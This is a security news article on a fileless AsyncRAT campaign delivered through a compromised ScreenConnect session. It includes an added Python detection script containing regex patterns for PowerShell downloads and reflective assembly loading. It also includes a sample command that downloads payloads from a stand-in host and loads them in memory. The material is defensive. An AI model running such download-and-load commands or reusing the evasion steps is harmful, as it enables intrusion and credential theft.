Cybersecurity researchers have uncovered a sophisticated fileless malware campaign that leverages legitimate system tools to deliver a potent remote access Trojan (RAT). By executing entirely in memory, this type of malware bypasses traditional disk-based detection, making it difficult to detect, analyze, or remove.
Initial Access Through Compromised Remote Tools
According to a LevelBlue advisory, the attack began with a compromised ScreenConnect client, a widely used remote access platform. Threat actors established an interactive session via the domain relay.shipperzone[.]online, associated with unauthorized ScreenConnect deployments.
During the session, a VBScript named Update.vbs executed via WScript, which triggered a PowerShell command to download two payloads: logs.ldk and logs.ldr. These files were saved to C:\Users\Public\ but never written as executables on disk. Instead, they were loaded directly into memory using reflection, a hallmark of fileless malware.
The first payload was converted into a byte array, while the second executed directly. Encoded data retrieved from the web was decoded in memory and invoked a .NET assembly to run the attack.
AsyncRAT Infection Chain
A first-stage .NET assembly, Obfuscator.dll, acts as the launcher for the AsyncRAT infection chain. LevelBlue’s analysis identified three main components:
- Class A – Initializes the runtime environment.
- Class Core – Ensures persistence through a scheduled task disguised as “Skype Updater” and loads additional payloads.
- Class Tafce5 – Disables Windows security logging, patches script scanning, and resolves APIs dynamically.
This modular architecture allows the malware to evade detection while preparing the system for the RAT payload.
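The delivery chain above (remote-tool session, Update.vbs under WScript, a PowerShell download of logs.ldk and logs.ldr into C:\Users\Public\, and a reflective in-memory load) and the "Skype Updater" scheduled task from the Class Core description are all behaviours that endpoint telemetry can surface. The following triage script is an added example, not code from LevelBlue or the article: it scans process-creation and scheduled-task records for those behaviours. The record layout, the rule names and the sample events are constructed for the example; only the indicators (the file names, the C:\Users\Public\ staging path, the task name and the use of .NET reflection) come from the advisory as reported here.

```python
"""
Added example: behaviour-based triage of constructed endpoint telemetry for
the fileless AsyncRAT delivery chain described in the article. The Event
layout, rule names and sample records are assumptions for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" (process creation) or "task" (scheduled task created)
    parent: str = ""     # parent image name, process events only
    image: str = ""      # child image name, process events only
    cmdline: str = ""    # command line (process) or task action (task)
    task_name: str = ""  # scheduled task name, task events only


# Script hosts the article names (WScript) plus its console sibling.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# User-writable locations an attacker can stage into without elevation;
# C:\Users\Public and %AppData% are both named in the article.
USER_WRITABLE = re.compile(r"(?i)(\\users\\public\\|\\appdata\\|\\temp\\)")
# .NET reflective assembly loading from a PowerShell command line.
REFLECTIVE_LOAD = re.compile(r"(?i)reflection\.assembly\]::load")
# Common PowerShell download primitives (example list, not exhaustive).
DOWNLOAD = re.compile(r"(?i)downloadfile|downloadstring|invoke-webrequest|iwr\s")
# The staging files from the article, under the path the article gives.
STAGE_FILE = re.compile(r"(?i)\\users\\public\\[^\s'\"]+\.(ldk|ldr)\b")


def check_process(ev: Event) -> list[str]:
    """Return the rule names a process-creation event triggers."""
    hits = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if "screenconnect" in parent and image in SCRIPT_HOSTS:
        hits.append("remote-tool-spawned-script-host")
    if image == "powershell.exe" and parent in SCRIPT_HOSTS and DOWNLOAD.search(ev.cmdline):
        hits.append("script-host-powershell-download")
    if REFLECTIVE_LOAD.search(ev.cmdline):
        hits.append("reflective-assembly-load")
    if STAGE_FILE.search(ev.cmdline):
        hits.append("staging-file-in-public")
    return hits


def check_task(ev: Event) -> list[str]:
    """Flag a task that borrows the 'Skype Updater' name but runs from a user-writable path."""
    if ev.task_name.strip().lower() == "skype updater" and USER_WRITABLE.search(ev.cmdline):
        return ["lookalike-task-user-writable-action"]
    return []


def triage(events: list[Event]) -> list[dict]:
    """Run every event through the matching rule set; one finding per rule hit."""
    findings = []
    for idx, ev in enumerate(events):
        hits = check_process(ev) if ev.kind == "process" else check_task(ev)
        findings.extend({"event": idx, "rule": rule} for rule in hits)
    return findings


# Constructed sample telemetry modelled on the chain in the article.
# The URL host and the last two events are invented for contrast.
SAMPLE_EVENTS = [
    Event("process", parent="ScreenConnect.ClientService.exe", image="wscript.exe",
          cmdline=r'wscript.exe "C:\Users\Public\Update.vbs"'),
    Event("process", parent="wscript.exe", image="powershell.exe",
          cmdline=r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                  r"'http://example.invalid/logs.ldk','C:\Users\Public\logs.ldk'); "
                  r"[System.Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\Users\Public\logs.ldr'))"),
    Event("task", task_name="Skype Updater", cmdline=r"C:\Users\Public\AsyncClient.exe"),
    # Benign: an administrator running PowerShell from Explorer.
    Event("process", parent="explorer.exe", image="powershell.exe",
          cmdline=r"powershell -c Get-ChildItem C:\Logs"),
    # Benign: a task with the same name whose action lives under Program Files.
    Event("task", task_name="Skype Updater", cmdline=r"C:\Program Files\Skype\Skype.exe"),
]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[finding["event"]]
        print(f"event {finding['event']} [{finding['rule']}] {ev.image or ev.task_name}: {ev.cmdline[:70]}")
```

The rules are deliberately behavioural rather than hash-based: a renamed Update.vbs or a new staging file name still trips the parent/child and reflective-load checks, while the scheduled-task rule keys on the mismatch between a trusted-looking name and an action that runs from a user-writable directory. In production these checks would run over Sysmon or EDR process-creation and task-creation events rather than the constructed records embedded here.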
AsyncRAT Capabilities
The RAT itself, executed via AsyncClient.exe, functions as a command-and-control (C2) engine, maintaining persistent access, performing system reconnaissance, and executing commands provided by attackers. Key features include:
- AES-256 decryption of embedded configuration, including C2 domains (e.g., 3osch20[.]duckdns[.]org), infection flags, and target directories (%AppData%).
- TCP-based communication using custom packet protocols for command dispatch.
- Data exfiltration, including OS details, privilege levels, antivirus status, active windows, and browser extensions such as MetaMask and Phantom.
- Keylogging with context capture and persistence through scheduled tasks.
The advisory notes:
“Breaking down these elements allows us to understand how the malware maintains persistence, dynamically loads payloads, and exfiltrates sensitive data such as credentials, clipboard contents, and browser artifacts. These findings support targeted detection and endpoint hardening based on observed behaviors.”
Implications for Organizations
This incident demonstrates the growing sophistication of fileless attacks, which can bypass traditional security measures. Organizations should prioritize endpoint monitoring, behavioral analysis, and proactive hardening to defend against memory-resident malware that exploits legitimate system tools.
Source: https://www.infosecurity-magazine.com/news/fileless-malware-deploys-advanced